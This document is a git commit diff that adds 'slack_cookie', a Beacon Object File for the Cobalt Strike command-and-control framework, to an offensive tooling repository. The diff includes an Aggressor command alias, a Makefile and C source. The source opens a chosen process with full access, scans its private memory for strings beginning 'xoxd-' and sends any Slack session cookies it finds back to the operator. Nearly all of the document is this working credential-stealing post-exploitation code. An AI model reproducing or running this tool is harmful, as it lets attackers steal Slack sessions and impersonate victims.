Add BOF to collect Slack cookies from Slack or browser processes

README.md

@@ -41,6 +41,7 @@ You are welcome to use these, but issues opened related to these will be closed
 |schtasksstop| Stop a running scheduled task|
 |setuserpass| Set a user's password|
 |shspawnas| A misguided attempt at injecting code into a newly spawned process|
+|slack_cookie| Collect the Slack authentication cookie from a Slack process|
 |unexpireuser| Set a user account to never expire|
 
 ## Contributing

Remote/Remote.cna

@@ -1820,4 +1820,27 @@ Usage: get_priv <Privledge Name>
 Privledge names are listed here https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants
 They are the equivilent of what you see in whoami /all or our whoami bof from the SA repo
 "
+);
+
+alias slack_cookie 
+{
+	local('$pid $args');
+	if(size(@_) != 2)
+	{
+		berror($1, "usage: slack_cookie <pid>");
+		return;
+	}
+	$pid = parseNumber($2, 10);
+    berror($1, $pid);
+
+	$args = bof_pack($1, "i", $pid);
+	beacon_inline_execute($1, readbof($1, "slack_cookie"), "go", $args);
+}
+
+beacon_command_register(
+	"slack_cookie",
+	"Searches memory for Slack tokens",
+	"Command: slack_cookie
+
+Usage: slack_cookie <pid> "
 );

src/Remote/slack_cookie/Makefile

@@ -0,0 +1,25 @@
+BOFNAME := slack_cookie
+COMINCLUDE := -I ../../common
+LIBINCLUDE := 
+CC_x64 := x86_64-w64-mingw32-gcc
+CC_x86 := i686-w64-mingw32-gcc
+CC=x86_64-w64-mingw32-clang
+
+all:
+	$(CC_x64) -o $(BOFNAME).x64.o $(COMINCLUDE) -Os -c entry.c -DBOF 
+	$(CC_x86) -o $(BOFNAME).x86.o $(COMINCLUDE) -Os -c entry.c -DBOF
+	mkdir -p ../../../Remote/$(BOFNAME) 
+	mv $(BOFNAME)*.o ../../../Remote/$(BOFNAME)
+
+test:
+	$(CC_x64) entry.c -g $(COMINCLUDE) $(LIBINCLUDE)  -o $(BOFNAME).x64.exe
+	$(CC_x86) entry.c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x86.exe
+
+scanbuild:
+	$(CC) entry.c -o $(BOFNAME).scanbuild.exe $(COMINCLUDE) $(LIBINCLUDE)
+
+check:
+	cppcheck --enable=all $(COMINCLUDE) --platform=win64 entry.c
+
+clean:
+	rm $(BOFNAME).*.exe

src/Remote/slack_cookie/entry.c

@@ -0,0 +1,208 @@
+#include <windows.h>
+#include "bofdefs.h"
+#include "base.c"
+
+//  Forward declarations:
+BOOL GetProcessList( int pid );
+void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz);
+void GetProcessMemory( HANDLE hProcess );
+
+typedef BOOL (*myReadProcessMemory)(
+    HANDLE hProcess,
+    LPCVOID lpBaseAddress,
+    LPVOID lpBuffer,
+    size_t nSize,
+    size_t *lpNumberOfBytesRead
+);
+
+typedef size_t(*myVirtualQueryEx)(
+    HANDLE hProcess,
+    LPCVOID lpAddress,
+    PMEMORY_BASIC_INFORMATION lpBuffer,
+    size_t dwLength
+);
+
+typedef struct _MEMORY_INFO 
+{
+    LPVOID offset;
+    unsigned long long size;
+    DWORD state;
+    DWORD protect;
+    DWORD type;
+} MEMORY_INFO, *PMEMORY_INFO;
+
+BOOL GetProcessList( int pid )
+{
+  HANDLE hProcess;
+  hProcess = KERNEL32$OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid);
+  if( hProcess == NULL )
+     { 
+    BeaconPrintf(CALLBACK_ERROR, "OpenProcess Failed");
+    return(FALSE);
+  } 
+
+  GetProcessMemory(hProcess);
+  KERNEL32$CloseHandle( hProcess );
+
+  return( TRUE );
+}
+
+void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz)
+{
+    myReadProcessMemory ptr_ReadProcessMemory = NULL;
+    BOOL rc = FALSE;
+    size_t bytesRead = 0;
+    unsigned char *buffer = NULL;
+    int index = 0;
+    int ret_sz = 1;
+
+    HMODULE KERNEL32 = LoadLibraryA("kernel32");
+    if( KERNEL32 == NULL)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Unable to load ws2 lib");
+        return;
+    }
+    ptr_ReadProcessMemory = (myReadProcessMemory)GetProcAddress(KERNEL32, "ReadProcessMemory");
+    if(!ptr_ReadProcessMemory )
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Could not load functions");
+        goto END;
+    }
+
+    buffer = intAlloc(address_sz+0x100);
+    if (buffer == NULL)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory");
+        goto END;
+    }
+
+    rc = ptr_ReadProcessMemory( hProcess, address, (char*)buffer, address_sz, &bytesRead );
+    if (rc == 0)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "\nReadProcessMemory failed\n");
+        BeaconPrintf(CALLBACK_ERROR, "Bytes Read %d\n", bytesRead);
+        BeaconPrintf(CALLBACK_ERROR, "\n\n\n %s\n\n\n", buffer );
+        return;
+    }
+
+    //for (index = 0; index < (address_sz/2)-8; index++)
+    for (index = 0; index < address_sz-5; index++)
+    {
+        // search for xoxd- [78 6f 78 64 2d] 
+        if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && buffer[index + 3] == 0x64 && buffer[index + 4] == 0x2d)
+        {
+            BeaconPrintf(CALLBACK_OUTPUT, "Slack Cookie: %s", buffer + index);
+            index += MSVCRT$strlen((char *)(buffer + index)) - 1;
+        }
+    }
+END:
+    intFree(buffer);
+}
+
+void GetProcessMemory( HANDLE hProcess )
+{
+    LPVOID lpAddress = 0;
+    MEMORY_BASIC_INFORMATION lpBuffer = {0};
+    size_t VQ_sz = 0;
+    myVirtualQueryEx ptr_VirtualQueryEx = NULL;
+
+    if( hProcess == 0 )
+    {
+        BeaconPrintf(CALLBACK_ERROR, "No Process Handle\n");
+        goto END;
+    }   
+
+    HMODULE KERNEL32 = LoadLibraryA("kernel32");
+    if( KERNEL32 == NULL)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Unable to load ws2 lib");
+        goto END;
+    }
+
+    ptr_VirtualQueryEx = (myVirtualQueryEx)GetProcAddress(KERNEL32, "VirtualQueryEx");
+    if(!ptr_VirtualQueryEx)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Could not load functions");
+        goto END;
+    }
+
+    do
+    {
+        PMEMORY_INFO mem_info = intAlloc(sizeof(MEMORY_INFO));
+        if (mem_info == NULL)
+        {
+            BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory");
+            goto END;
+        }
+        MSVCRT$memset(mem_info, 0, sizeof(MEMORY_INFO));
+        VQ_sz = ptr_VirtualQueryEx(hProcess, lpAddress, &lpBuffer, 0x30);
+        if( VQ_sz == 0x30 )
+        {
+            if(lpBuffer.State == MEM_COMMIT || lpBuffer.State == MEM_RESERVE) 
+            {
+                mem_info->offset = lpAddress;
+                mem_info->size = lpBuffer.RegionSize;
+                mem_info->state = lpBuffer.State;
+                mem_info->type = lpBuffer.Type;
+                mem_info->protect = lpBuffer.Protect;
+            }else if( lpBuffer.State == MEM_FREE)
+            {
+                mem_info->offset = lpAddress;
+                mem_info->size = lpBuffer.RegionSize;
+                mem_info->state = lpBuffer.State;
+                mem_info->type = lpBuffer.Type;
+                mem_info->protect = lpBuffer.Protect;
+            }    
+        }else if (VQ_sz == 0)
+        {
+            BeaconPrintf(CALLBACK_OUTPUT, "End of memory\n");
+            goto END;
+        }   
+        lpAddress = lpAddress + mem_info->size;
+        if( mem_info->protect == PAGE_READWRITE && mem_info->type == MEM_PRIVATE)
+            Write_Memory_Range( hProcess, mem_info->offset, mem_info->size);
+        intFree( mem_info );
+    } while(1);
+END:
+    return;
+}
+
+#ifdef BOF
+VOID go( 
+    IN PCHAR Buffer, 
+    IN ULONG Length 
+) 
+{
+      int pid = 0;
+    if(!bofstart())
+    {
+        return;
+    }
+
+    datap parser = {0};
+    BeaconDataParse(&parser, Buffer, Length);
+    pid = BeaconDataInt(&parser); 
+
+    BeaconPrintf(CALLBACK_OUTPUT, "Searching only for the following PID %d\n", pid);
+    GetProcessList( pid );
+
+    printoutput(TRUE);
+    bofstop();
+};
+
+#else
+
+int main( int argc, char* argv[])
+{
+//code for standalone exe for scanbuild / leak checks
+    int pid = 0;
+    if (argc > 1)
+    {
+      pid = atoi(argv[1]); 
+      BeaconPrintf(CALLBACK_OUTPUT, "Searching only for the following PID %d\n", pid);
+    }
+    GetProcessList( pid );
+    return 0;
+}
+
+#endif